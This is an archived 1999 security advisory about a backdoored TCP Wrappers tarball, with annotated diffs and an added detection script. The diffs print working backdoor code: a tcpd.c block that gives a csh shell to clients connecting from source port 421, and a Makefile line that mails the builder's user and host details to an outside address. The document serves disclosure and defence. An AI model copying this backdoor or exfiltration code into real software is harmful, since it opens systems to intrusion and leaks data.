backdoored tcp wrapper source code

From: Wietse Venema (wietseat_private)
Date: Thu Jan 21 1999 - 08:38:17 PST


    TCP Wrappers is a widely-used security tool to protect UNIX systems
    against intrusion. It has an estimated installed base of millions.
    
    Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
    a backdoored version. Eventually this was bound to happen, and
    that's why the source file is accompanied by a PGP signature.  But
    that is no guarantee against people downloading and installing
    backdoored software.
    
    The backdoor gives access to a privileged shell when a client
    connects from port 421.
    
    The backdoored copy was downloaded 52 times between 07:16 MET and
    16:29 MET. I have informed the sites that downloaded a copy.
    
    Below are details on how to recognize the backdoored version.
    
            Wietse
    
    Relevant time stamp/size information (times relative to MET):
    
    Backdoored version:
    
        % ls -lcta
        -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
        ...
        dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .
    
    Restored version:
    
        % ls -lt tcp_wrappers_7.6.tar.gz
        -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
    
    The signature of the bad TAR file is: length 99186 instead of 99438.
    The signature of a compiled tcpd binary is:
    
        strings -a tcpd | grep csh
    
    any output probably means trouble.
    
    Changes that were made to the tcp wrapper 7.6 source code:
    
    diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
    *** 7.6/Makefile        Mon Apr  7 20:34:16 1997
    --- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
    ***************
    *** 26,31 ****
    --- 26,32 ----
            @echo
            @echo "If none of these match your environment, edit the system"
            @echo "dependencies sections in the Makefile and do a 'make other'."
    +       @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpdat_private'
            @echo
    
      #######################################################
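Review bot: the added `@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug ...'` line mails the builder's user name and full `uname -a` output to an outside address every time `make` is run with no target (the help-text branch), and the leading `@` keeps the command out of the build transcript; it has no place in a Makefile and should be dropped outright. Note also the file header above this hunk: the modified Makefile carries an mtime of Fri Mar 21 1997, earlier than the original's Mon Apr 7 1997, so the timestamp was forged and cannot be relied on to spot the change.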
    ***************
    *** 649,655 ****
      # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
      # Solaris 2.x, and Linux. See your system documentation for details.
      #
    ! KILL_OPT= -DKILL_IP_OPTIONS
    
      ## End configuration options
      ############################
    --- 650,656 ----
      # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
      # Solaris 2.x, and Linux. See your system documentation for details.
      #
    ! # KILL_OPT= -DKILL_IP_OPTIONS
    
      ## End configuration options
      ############################
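Review bot: commenting out `KILL_OPT= -DKILL_IP_OPTIONS` disables the KILL_IP_OPTIONS protection while leaving the explanatory comment about source-routed traffic directly above it untouched, and no rationale is given anywhere in the change; restore the uncommented line. A change that silently weakens a protection, with no accompanying comment, documentation or changelog entry, is exactly what review should reject.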
    Only in 7.6: Makefile-
    diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
    *** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
    --- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
    ***************
    *** 41,52 ****
    --- 41,63 ----
      int     allow_severity = SEVERITY;    /* run-time adjustable */
      int     deny_severity = LOG_WARNING;  /* ditto */
    
    + char    IDENT[]="NC421\n";
    + char    SRUN[]="-csh";
    + char    SPATH[]="/bin/csh";
    + #define PORT 421
    +
      main(argc, argv)
      int     argc;
      char  **argv;
      {
          struct request_info request;
    +     struct sockaddr_in from;
          char    path[MAXPATHNAMELEN];
    +     int     fromlen;
    +
    +     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
    +     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
    +     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
    
          /* Attempt to prevent the creation of world-writable files. */
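Review bot: the inserted block at the top of main() calls getpeername() on fd 0 and, when the client's source port equals 421 (`#define PORT 421`), writes "NC421\n" back to the socket and execl()s /bin/csh as "-csh", replacing tcpd with a shell before any of tcpd's own processing runs; the whole addition, including the IDENT/SRUN/SPATH globals, must be removed. Because tcpd runs with whatever privileges it was started with, this hands a shell at that privilege level to any client that can choose its source port, which is what the post above describes. Three further things are visible in this hunk: the diff header shows identical mtimes (Sun Feb 11 11:01:33 1996) for both files, so the edit was hidden by preserving the timestamp; the string literals "-csh" and "/bin/csh" are what make `strings -a tcpd | grep csh` a usable detector for a built binary; and the code is squeezed onto three lines with several statements run together, which even a plain style check should have flagged.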
    
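The indicators in the post (tarball size, the PGP signature that accompanies the source, and the `csh` string in a built `tcpd`) can be turned into a small pre-install check. The script below is an added example and is not part of Wietse's message or of the TCP Wrappers distribution. The two sizes come from the post; the signature file name `tcp_wrappers_7.6.tar.gz.sig`, the use of `gpg` for verification, and the function names are assumptions made here for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): integrity checks for a
# downloaded tcp_wrappers_7.6.tar.gz and a compiled tcpd binary, based on
# the indicators given in the message above.

GOOD_SIZE=99438   # size of the restored archive (from the post)
BAD_SIZE=99186    # size of the backdoored archive (from the post)

# check_tarball_size FILE
#   returns 0 if FILE has the size of the restored archive,
#           1 if it has the size of the backdoored archive,
#           2 if it matches neither (unknown; treat as suspect).
check_tarball_size() {
    size=$(( $(wc -c < "$1") ))   # arithmetic strips any leading spaces
    if [ "$size" -eq "$GOOD_SIZE" ]; then
        return 0
    elif [ "$size" -eq "$BAD_SIZE" ]; then
        return 1
    fi
    return 2
}

# verify_signature FILE
#   Verifies the detached PGP signature FILE.sig with gpg (assumed name
#   and tool). Returns gpg's status, or 2 when verification is impossible
#   (no gpg, no signature file) so the caller never mistakes that for "good".
verify_signature() {
    sig="$1.sig"
    if ! command -v gpg >/dev/null 2>&1; then
        echo "gpg not found; cannot verify $sig" >&2
        return 2
    fi
    if [ ! -f "$sig" ]; then
        echo "no signature file $sig; refusing to trust $1" >&2
        return 2
    fi
    gpg --verify "$sig" "$1"
}

# scan_binary TCPD
#   Emulates 'strings -a tcpd | grep csh' with tr and grep only: every
#   non-printable byte becomes a line break, then the printable runs are
#   searched for "csh". Returns 0 if the string is present (suspect),
#   1 if it is absent.
scan_binary() {
    if LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -q csh; then
        echo "WARNING: $1 contains 'csh'; probably backdoored" >&2
        return 0
    fi
    return 1
}

# Typical use:  ./check.sh tcp_wrappers_7.6.tar.gz [tcpd]
main() {
    tarball="$1"; binary="$2"; status=0
    check_tarball_size "$tarball"
    case $? in
        0) echo "$tarball: size matches the restored archive" ;;
        1) echo "$tarball: size matches the BACKDOORED archive"; status=1 ;;
        2) echo "$tarball: unexpected size; verify the signature"; status=1 ;;
    esac
    verify_signature "$tarball" || status=1
    if [ -n "$binary" ] && scan_binary "$binary"; then
        status=1
    fi
    return "$status"
}

# Only run main when executed directly, so the functions can be sourced.
case "$0" in
    */check.sh|check.sh) main "$@" ;;
esac
```

The size check only catches this particular substitution; the signature check is the one that generalizes, which is why the script treats a missing signature or a missing `gpg` as a failure rather than silently passing.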



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:29:36 PDT